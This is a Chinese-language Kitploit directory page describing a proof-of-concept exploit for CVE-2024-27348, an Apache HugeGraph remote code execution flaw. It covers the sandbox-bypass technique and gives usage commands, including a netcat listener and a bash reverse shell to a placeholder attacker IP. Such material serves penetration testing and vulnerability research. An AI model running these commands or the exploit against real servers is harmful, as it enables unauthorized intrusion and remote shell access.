Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-27348-HugeGraph-RCE — CVE-2024-27348 的高级 PoC 利用,通过沙箱绕过和非盲命令执行在 Apache HugeGraph 中实现可靠的 RCE。 | Kitploit
工具/GitHubGitHub/akelaqe/cve-2024-27348-hugegraph-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubakelaqe/cve-2024-27348-hugegraph-rce

CVE-2024-27348-HugeGraph-RCE

CVE-2024-27348 的高级 PoC 利用,通过沙箱绕过和非盲命令执行在 Apache HugeGraph 中实现可靠的 RCE。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
125个月前尚未审核
分享

CVE-2024-27348:Apache HugeGraph RCE(高级沙箱绕过)

Python 3.x Exploit CVE

一个针对 CVE-2024-27348(Apache HugeGraph 服务器远程代码执行)的高级、高可靠性概念验证(PoC)利用程序。

与许多盲目执行命令或因 Java 的 Runtime.exec() 限制而在复杂载荷上失败的公开 PoC 不同,此脚本专为实际渗透测试场景中的高可靠性而设计。

⚠️ 免责声明

仅供教育和授权测试目的使用。 此工具提供给安全研究人员、渗透测试人员和系统管理员,用于在授权环境中验证漏洞。作者不对任何滥用或由此工具造成的损害负责。

✨ 功能与技术改进

此利用程序通过解决三个关键问题改进了早期的公开 PoC:

  1. HugeSecurityManager 沙箱绕过: HugeGraph 沙箱会阻止名称为 gremlin-server-exec-* 或 task-worker-* 的调用线程执行。此载荷使用 Java 反射在触发载荷前动态将执行线程重命名为 BypassThread,从而无缝绕过安全管理器。
  • 复杂载荷处理: 与在空格处破坏复杂 bash 命令(如反弹 shell)的 Runtime.getRuntime().exec(String) 不同,此利用程序使用 ProcessBuilder 并采用正确格式化的 List<String>。这允许安全执行带有引号和重定向的复杂载荷。
  • 完整输出读取(非盲式 RCE): 该脚本使用 Java Scanner 读取已执行进程的 InputStream,并在 JSON HTTP 响应中返回命令的实际输出。你可以精确看到服务器所见的内容。
  • ⚙️ 要求

    • Python 3.x
    • requests 库

    安装所需依赖:

    root@kitploit:~
    pip3 install requests
    

    🚀 使用方法

    root@kitploit:~
    python3 exploit.py -u <TARGET_URL> -c <COMMAND>
    

    示例

    1. 基本命令执行(读取输出):
    root@kitploit:~
    python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
    
    1. 生成反弹 Shell: 由于载荷能正确处理空格和引号,你可以直接注入标准的 bash 反弹 shell,无需进行 base64 编码或分阶段处理:
    root@kitploit:~
    # On your attacker machine, start a listener:
    nc -lvnp 4444
    
    # Execute the exploit:
    python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
    

    🔍 漏洞详情

    Apache HugeGraph 服务器暴露了一个 Gremlin API 端点(/gremlin),允许用户提交 Groovy 脚本。由于修补前版本中的沙箱保护不足,未经身份验证的攻击者可以通过 Java 反射执行任意操作系统命令。

    下载工具